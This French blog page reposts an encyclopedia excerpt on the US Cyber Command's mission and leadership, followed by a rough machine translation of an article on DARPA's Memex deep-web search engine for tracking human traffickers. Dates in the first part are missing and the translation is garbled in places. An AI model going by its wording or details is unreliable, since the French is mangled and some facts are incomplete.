Garnison Fort George G. Meade (Maryland)
Surnom USCYBERCOM
Commandant Michael S. Rogers
L’United States Cyber Command (USCYBERCOM) est un sous-commandement interarmées de combat, subordonné à l'United States Strategic Command, dans les forces armées des États-Unis. Il est chargé de la sécurité de l'information pour l'armée.
Activé officiellement le au Fort George G. Meade dans le Maryland, le général Keith B. Alexander est nommé le jour même commandant de l'unité[1]. Il occupe ce poste jusqu'à son départ du service actif le , son remplaçant à la tête de la NSA l'amiral Michael S. Rogers devient également le commandant du United States Cyber Command.

Mission

L'USCYBERCOM « planifie, coordonne, intègre, synchronise et conduit des activités pour : diriger les opérations et la défense de certains réseaux d'information du Département de la Défense, et prépare et, au besoin, conduit, tout le spectre d'opérations militaires du cyberespace dans le but de permettre des actions dans tous les domaines, assurer la liberté d'action des États-Unis et de leurs alliés dans le cyberespace, et le dénier à nos adversaires ». L'emblème de l'USCYBERCOM contient la mention « 9ec4c12949a4f31474f299058ce2b22a » qui est le hachage MD5 de leur mission[2].
On prévoit qu'il dispose de trois types de forces placées sous le commandement cybernétique:

Effectifs

En janvier 2013, il compte 900 personnes. À cette date, on spécule sur une augmentation des effectifs dans les prochaines années à 4 900 militaires et civils[3].

Composantes

Source.:

vendredi 13 février 2015

Deep Web Search Engine Memex lutte contre la criminalité


Deep Web Search Engine Memex lutte contre la criminalité dans peu comme Minority Report

Deep Web Search Engine Memex Fights Crime a Bit Like Minority Report

Il y a exactement un an, la DARPA avait annoncé une mission inspiré de scienfiction : pour créer un moteur de recherche qui pourrait trouver des choses sur le web profond Que les robots de Google manqueraient. Le soi-disant projet Memex est maintenant bien engagée, et pour la première fois nous obtenons un regard sur le moteur de recherche de lutte contre la criminalité dans l'action.

Pardonnez le cliché référence Philip K. Dick, mais ressemble un peu Memex a quelque chose que vous verriez dans Minority Report. L'agence de recherche du Pentagone a proposé a Scientific American 60 Minutes , un look exclusif de la technologie, et les caractéristiques son absolument hallucinante.

Sur le plan de surface, Memex fonctionne comme un moteur de recherche qui étend ses tentacules dans le web profond et Darknet. Depuis les goûts de Google et Bing ,indice seulement environ 10 pour cent du web, cette fonctionnalité de base est essentielle pour suivre les mouvements criminels, en particulier ceux des trafiquants d'êtres humains qui maintiennent le plus bas profils.

Alors, prenez ce scénario: Si un enquêteur criminel a un lien vers une annonce postée par un trafiquant d'êtres humains, l'enquêteur aurait du mal à trouver d'autres indices depuis les trafiquants d'êtres humains tirez des annonces avant que Google a une chance de les indexer. Memex contourne cela.

La technologie de prochaine génération aux questions beaucoup plus large échantillon de l'Internet, y compris profonde web et des liens darknet, de trouver des liens entre le terme de recherche et ses résultats, sans parler des liens entre les résultats.

Après la recherche initiale, Memex produira alors un soi-disant
"date de réveil" qui montre toutes les autres pages qui sont liées à des liens que vous avez cliqué sur, mais ne pourriez pas voir autrement. Il ressemble à ceci:

Deep Web Search Engine Memex lutte contre la criminalité un peu comme Minority Report

Deep Web Search Engine Memex Fights Crime a Bit Like Minority Report
C' est juste un truc. Les robots d'indexation suralimentés sont anche en mesure de suivre les mouvements des trafiquants d'êtres humains en regardant où ils soumettre . Encore une fois, ce sont des liens qui ne peut se glisser à travers les pistes de Google. Les mouvements peuvent être compilés dans les cartes de chaleur ou des cartes des mouvements d'un criminel:


Deep Web Search Engine Memex Fights Crime a Bit Like Minority Report






Deep Web Search Engine Memex lutte contre la criminalité un peu comme Minority Report

Les choses deviennent vraiment futuriste quand vous prenez en compte la dernière fonction Memex. La technologie est actuellement testé en version bêta par deux bureaux d'avocats de district, un organisme d'application de la loi et une organisation non gouvernementale. Les prochaines étapes de tests, deux pour commencer avec un groupe plus large des bêta-testeurs dans quelques semaines, est l'endroit où les choses commencent à ressembler beaucoup plus à Minority Report. De Scientific American:

     L'un des principaux objectifs de ce cycle est de tester de nouvelles capacités de recherche de l'image qui permet d'analyser les photos même lorsque des parties qui pourraient aider les enquêteurs, y compris les visages des trafiquants ou un écran de télévision en arrière-plan sont-obscurcis. Un autre objectif est d'essayer différentes interfaces utilisateur et d'expérimenter avec des architectures de streaming qui évaluent les données sensibles au facteur temps.

Vous avez entendu ce droit. DARPA veut attraper les criminels en regardant les reflets sur les écrans de télévision, de la même façon Tom Cruise que les chiffres sur les détails de crimes avant qu'ils ne surviennent. Bien sûr, Memex ne peut pas voir dans l'avenir. Cependant, l'idée est que la technologie se arrêtera trafiquants d'êtres humains avant qu'ils ne blessent plus de personnes . Tous qu'a besoin le DARPA maintenant ,ce sont des gants étranges, un écran de taille d'une pièce, et certains mutants, les humains prophétiques de trempage dans une chambre spéciale, et l'agence sera enfin une réalité sur la vision de Philip K. Dick de Minority Report. [Sciam, 60 Minutes]



Source.: